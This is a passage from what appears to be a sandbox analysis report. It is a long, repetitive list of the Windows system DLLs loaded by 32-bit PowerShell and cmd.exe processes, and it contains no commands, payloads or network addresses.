                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
